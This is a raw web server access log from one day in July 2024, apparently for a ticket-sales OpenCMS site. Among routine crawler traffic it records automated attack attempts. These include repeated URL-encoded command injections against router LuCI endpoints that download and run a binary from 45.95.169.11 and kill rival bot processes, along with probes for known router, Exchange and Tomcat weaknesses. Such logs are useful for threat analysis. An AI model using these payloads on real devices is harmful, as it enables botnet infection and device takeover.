87.121.69.27 - - [07/Jul/2024:00:10:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 172.206.136.234 - - [07/Jul/2024:00:13:42 +0200] "GET /actuator/health HTTP/1.1" 404 - 94.156.10.163 - - [07/Jul/2024:00:14:11 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 78.108.177.54 - - [07/Jul/2024:00:31:42 +0200] "GET / HTTP/1.0" 404 - 66.249.66.162 - - [07/Jul/2024:00:39:53 +0200] "GET /ticket2/opencms/en/buy/?comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=D414C6A5-7A03-3389-42A8-D7B7FE32BB37 HTTP/1.1" 200 68927 10.132.0.222 - - [07/Jul/2024:00:52:54 +0200] "GET / HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:01:25:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:01:25:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 162.216.149.157 - - [07/Jul/2024:01:26:27 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 162.216.149.157 - - [07/Jul/2024:01:26:29 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 176.111.174.110 - - [07/Jul/2024:01:40:22 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 176.111.174.110 - - [07/Jul/2024:01:40:29 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 94.156.10.163 - - [07/Jul/2024:02:01:13 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 4.151.33.203 - - [07/Jul/2024:02:13:23 +0200] "GET /ticket2/opencms/version HTTP/1.1" 404 - 184.105.247.219 - - [07/Jul/2024:02:35:08 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [07/Jul/2024:02:35:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 184.105.247.199 - - [07/Jul/2024:02:35:49 +0200] "GET /favicon.ico HTTP/1.1" 404 - 184.105.247.215 - - [07/Jul/2024:02:36:22 +0200] "GET /?format=json HTTP/1.1" 404 - 184.105.247.243 - - [07/Jul/2024:02:36:46 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 - 23.95.209.192 - - [07/Jul/2024:02:37:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 198.71.55.21 - - [07/Jul/2024:02:39:28 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 - 80.240.60.11 - - [07/Jul/2024:02:40:52 +0200] "GET / HTTP/1.1" 404 - 40.77.167.181 - - [07/Jul/2024:02:48:29 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 40.77.167.181 - - [07/Jul/2024:02:48:30 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 52.167.144.23 - - [07/Jul/2024:02:48:36 +0200] "GET /ticket2/opencms/en/venue/?venueid=279B18FD-4210-8852-93EB-A84B5C61044A HTTP/1.1" 200 63636 141.98.83.197 - - [07/Jul/2024:03:37:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [07/Jul/2024:03:37:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 80.76.49.133 - - [07/Jul/2024:03:44:06 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 - 205.210.31.177 - - [07/Jul/2024:03:48:53 +0200] "GET / HTTP/1.0" 404 - 45.148.10.174 - - [07/Jul/2024:04:03:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:04:03:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 64.62.197.50 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 64.62.197.153 - - [07/Jul/2024:04:28:59 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 64.227.7.255 - - [07/Jul/2024:04:33:58 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 64.62.197.152 - - [07/Jul/2024:04:35:50 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 64.62.197.156 - - [07/Jul/2024:04:37:30 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 64.62.197.156 - - [07/Jul/2024:04:37:31 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 64.62.197.154 - - [07/Jul/2024:04:39:46 +0200] "GET /ticket2/opencms/geoserver/web/ HTTP/1.1" 404 - 87.121.69.27 - - [07/Jul/2024:04:48:43 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 38.222.49.125 - - [07/Jul/2024:05:03:51 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 - 185.142.236.43 - - [07/Jul/2024:05:05:14 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 185.142.236.43 - - [07/Jul/2024:05:05:15 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 185.142.236.43 - - [07/Jul/2024:05:05:41 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 185.142.236.43 - - [07/Jul/2024:05:05:41 +0200] "GET /ticket2/opencms/sitemap.xml HTTP/1.1" 200 37572 185.142.236.43 - - [07/Jul/2024:05:05:43 +0200] "GET /ticket2/opencms/.well-known/security.txt HTTP/1.1" 404 - 185.142.236.43 - - [07/Jul/2024:05:05:45 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 91.92.251.254 - - [07/Jul/2024:05:15:40 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 - 106.75.165.113 - - [07/Jul/2024:06:03:03 +0200] "GET /E7hx HTTP/1.1" 404 - 106.75.165.113 - - [07/Jul/2024:06:03:03 +0200] "GET /hU5k HTTP/1.1" 404 - 106.75.165.113 - - [07/Jul/2024:06:03:04 +0200] "GET stager HTTP/1.1" 400 - 106.75.165.113 - - [07/Jul/2024:06:03:06 +0200] "GET stager64 HTTP/1.1" 400 - 45.148.10.174 - - [07/Jul/2024:06:05:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:06:05:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 87.121.69.27 - - [07/Jul/2024:06:29:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 68.183.197.80 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 68.183.197.80 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 68.183.197.80 - - [07/Jul/2024:06:47:09 +0200] "GET / HTTP/1.1" 404 - 68.183.197.80 - - [07/Jul/2024:06:47:09 +0200] "GET /download/powershell/ HTTP/1.1" 404 - 195.246.120.122 - - [07/Jul/2024:06:48:22 +0200] "GET / HTTP/1.0" 404 - 34.76.158.233 - - [07/Jul/2024:07:08:52 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 172.121.216.47 - - [07/Jul/2024:07:17:55 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 - 172.121.216.47 - - [07/Jul/2024:07:17:55 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 - 172.121.216.22 - - [07/Jul/2024:07:17:57 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 - 172.121.216.22 - - [07/Jul/2024:07:17:57 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 - 54.218.35.1 - - [07/Jul/2024:07:18:01 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 54.218.35.1 - - [07/Jul/2024:07:18:01 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39340 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71024 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541 54.218.35.1 - - [07/Jul/2024:07:18:02 +0200] "GET /ticket2/opencms/img/insta.png HTTP/1.1" 200 3967 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3928 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/img/banner-pl.jpeg HTTP/1.1" 200 41818 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/img/banner-ll.jpeg HTTP/1.1" 200 41825 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/img/banner-sa.jpeg HTTP/1.1" 200 41270 54.218.35.1 - - [07/Jul/2024:07:18:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740 54.218.35.1 - - [07/Jul/2024:07:18:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196 54.218.35.1 - - [07/Jul/2024:07:18:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487 54.218.35.1 - - [07/Jul/2024:07:18:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570 54.218.35.1 - - [07/Jul/2024:07:18:04 +0200] "GET /ticket2/opencms/img/check.png HTTP/1.1" 200 548 54.218.35.1 - - [07/Jul/2024:07:18:04 +0200] "GET /ticket2/opencms/img/mail.png HTTP/1.1" 200 403 54.218.35.1 - - [07/Jul/2024:07:18:04 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416 54.218.35.1 - - [07/Jul/2024:07:18:04 +0200] "GET /ticket2/opencms/img/arrow.png HTTP/1.1" 200 753 54.218.35.1 - - [07/Jul/2024:07:18:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 - 54.218.35.1 - - [07/Jul/2024:07:18:05 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/en/login/ HTTP/1.1" 200 65723 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39340 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71024 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338 54.218.35.1 - - [07/Jul/2024:07:18:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923 54.218.35.1 - - [07/Jul/2024:07:18:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3928 54.218.35.1 - - [07/Jul/2024:07:18:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737 54.218.35.1 - - [07/Jul/2024:07:18:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175 54.218.35.1 - - [07/Jul/2024:07:18:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/arrow.gif HTTP/1.1" 200 344 54.218.35.1 - - [07/Jul/2024:07:18:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/form_marker.gif HTTP/1.1" 200 43 54.218.35.1 - - [07/Jul/2024:07:18:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_left.gif HTTP/1.1" 200 232 54.218.35.1 - - [07/Jul/2024:07:18:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_center.gif HTTP/1.1" 200 66 54.218.35.1 - - [07/Jul/2024:07:18:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_right.gif HTTP/1.1" 200 232 54.218.35.1 - - [07/Jul/2024:07:18:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 - 54.218.35.1 - - [07/Jul/2024:07:18:36 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 54.218.35.1 - - [07/Jul/2024:07:18:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39340 54.218.35.1 - - [07/Jul/2024:07:18:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871 54.218.35.1 - - [07/Jul/2024:07:18:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583 54.218.35.1 - - [07/Jul/2024:07:18:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71024 54.218.35.1 - - [07/Jul/2024:07:18:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229 54.218.35.1 - - [07/Jul/2024:07:18:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338 54.218.35.1 - - [07/Jul/2024:07:18:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923 54.218.35.1 - - [07/Jul/2024:07:18:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3928 45.164.23.133 - - [07/Jul/2024:07:22:52 +0200] "POST /tmUnblock.cgi HTTP/1.1" 404 - 141.98.83.197 - - [07/Jul/2024:07:40:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [07/Jul/2024:07:40:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 52.167.144.176 - - [07/Jul/2024:07:44:34 +0200] "GET /ticket2/opencms/en/venue/?venueid=92B1EF2C-B01A-5498-4DA0-D832A3A798A5 HTTP/1.1" 200 63639 94.156.10.163 - - [07/Jul/2024:07:46:59 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 40.77.167.28 - - [07/Jul/2024:08:23:57 +0200] "GET /ticket2/opencms/en/venue/?venueid=1A07979F-26B7-9D0A-9C33-48FC940808FF HTTP/1.1" 200 63624 71.6.135.131 - - [07/Jul/2024:08:33:58 +0200] "GET / HTTP/1.1" 404 - 71.6.135.131 - - [07/Jul/2024:08:33:59 +0200] "GET /favicon.ico HTTP/1.1" 404 - 204.48.21.58 - - [07/Jul/2024:08:57:51 +0200] "GET /manager/html HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:09:17:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:09:17:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 88.214.25.61 - - [07/Jul/2024:09:20:20 +0200] "��/*?�����Cookie: mstshash=Administr " 400 - 80.87.206.197 - - [07/Jul/2024:09:23:33 +0200] "��??f?9k?S?w?e!{???X&??X� ????? ??;???^??b???????)?{?|???H=�>?,?0�????????+?/�??$?(�k?#?'�g?" 400 - 80.87.206.197 - - [07/Jul/2024:09:23:33 +0200] "��?V???uHF?i\"???11??G?G????k??D b?CoabL????0*???(y?x??}??<??�>?,?0�????????+?/�??$?(�k?#?'�g? " 400 - 87.121.69.27 - - [07/Jul/2024:09:30:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 172.245.131.82 - - [07/Jul/2024:09:42:26 +0200] "GET / HTTP/1.1" 404 - 59.178.189.96 - - [07/Jul/2024:09:45:08 +0200] "GET / HTTP/1.1" 404 - 40.77.167.50 - - [07/Jul/2024:09:47:52 +0200] "GET /ticket2/opencms/en/about/ HTTP/1.1" 200 63237 148.153.56.82 - - [07/Jul/2024:09:54:13 +0200] "GET /ticket2/opencms/GFfi HTTP/1.1" 404 - 148.153.56.82 - - [07/Jul/2024:09:54:14 +0200] "GET /ticket2/opencms/1cde HTTP/1.1" 404 - 148.153.56.82 - - [07/Jul/2024:09:54:15 +0200] "GET /ticket2/opencms/aab8 HTTP/1.1" 404 - 148.153.56.82 - - [07/Jul/2024:09:54:15 +0200] "GET /ticket2/opencms/jquery-3.3.1.slim.min.js HTTP/1.1" 404 - 148.153.56.82 - - [07/Jul/2024:09:54:16 +0200] "GET /ticket2/opencms/aab9 HTTP/1.1" 404 - 148.153.56.82 - - [07/Jul/2024:09:54:17 +0200] "GET /ticket2/opencms/jquery-3.3.2.slim.min.js HTTP/1.1" 404 - 94.156.10.163 - - [07/Jul/2024:10:05:32 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 38.166.2.227 - - [07/Jul/2024:10:16:12 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 - 185.191.171.13 - - [07/Jul/2024:10:32:27 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 85.208.96.207 - - [07/Jul/2024:10:32:29 +0200] "GET /ticket2/opencms/en/sport/football-tickets/premier_league/tottenham/ HTTP/1.1" 200 64498 40.77.167.13 - - [07/Jul/2024:10:34:52 +0200] "GET /ticket2/opencms/sitemap.xml.gz HTTP/1.1" 404 - 127.0.0.1 - - [07/Jul/2024:11:08:54 +0200] "GET / HTTP/1.1" 400 - 40.77.167.26 - - [07/Jul/2024:11:26:47 +0200] "GET /ticket2/opencms/sitemap.xml.gz HTTP/1.1" 404 - 40.77.167.26 - - [07/Jul/2024:11:29:15 +0200] "GET /ticket2/opencms/en/venue/?venueid=69923349-A528-C93F-2999-4DA35CF7FB58 HTTP/1.1" 200 63648 172.169.4.164 - - [07/Jul/2024:11:31:41 +0200] "GET /ticket2/opencms/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 - 60.191.125.35 - - [07/Jul/2024:11:36:00 +0200] "HEAD / HTTP/1.1" 404 - 167.94.146.58 - - [07/Jul/2024:11:42:08 +0200] "GET / HTTP/1.1" 404 - 167.94.146.58 - - [07/Jul/2024:11:42:19 +0200] "GET / HTTP/1.1" 404 - 167.94.146.58 - - [07/Jul/2024:11:42:19 +0200] "PRI * HTTP/2.0" 505 - 185.191.171.15 - - [07/Jul/2024:11:42:37 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 185.191.171.2 - - [07/Jul/2024:11:42:37 +0200] "GET /ticket2/opencms/dk/ask-form.html HTTP/1.1" 200 2971 4.151.38.195 - - [07/Jul/2024:11:43:32 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 178.215.236.152 - - [07/Jul/2024:11:46:28 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 - 87.121.69.27 - - [07/Jul/2024:11:48:41 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 83.97.73.245 - - 